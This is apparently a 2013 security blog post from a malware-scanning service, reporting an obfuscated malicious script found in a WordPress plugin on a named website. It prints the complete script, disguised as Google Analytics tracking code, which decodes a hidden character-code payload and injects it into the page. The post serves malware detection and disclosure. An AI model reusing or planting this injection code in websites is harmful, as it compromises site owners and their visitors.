Tuesday, March 26, 2013

Malicious WordPress plugin using dynamic "fromCharCode" method

Malicious WordPress plugin

Online Website Malware Scanner detected similar malicious JavaScript script in the WordPress plugin. We already encounter similar patterns in other websites. 

Full website malware scan report: http://quttera.com/detailed_report/www.afwake.com
Submission date: Mon Mar 25 20:30:03 2013
Quttera website scan report snapshot:




The malicious JavaScript with dynamic "fromCharCode"

<script type='text/javascript' language='javascript'>
    var _ga7 = [];
    _ga7.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']);
    _ga7.push(['_setOption', '6918518510413211616916718518716717816517619318218118517']);
    _ga7.push(['_trackPageview', '5186175181180128167168185181178187186171129169178175182']);
    _ga7.push(['_setPageId', '1281841711691861101221211221821901141671871861811141671']);
    _ga7.push(['_setOption', '8718618111412212112218219011112919513011718518619117817']);
    _ga7.push(['_setOption', '1132']);
    var t = z = '',
        l = pos = v = 0,
        a1 = "arCo",
        a2 = "omCh";
    for (v = 0; v < _ga7.length; v++) t += _ga7[v][1];
    l = t.length;
    while (pos < l) z += String["fr" + a2 + a1 + "de"](parseInt(t.slice(pos, pos += 3)) - 70);
    document.write(z);
</script>

Related post

Similar case with malicious Google Analytics plugin discussed here http://quttera.blogspot.co.il/2013/03/malicious-wordpress-plugin-detection.html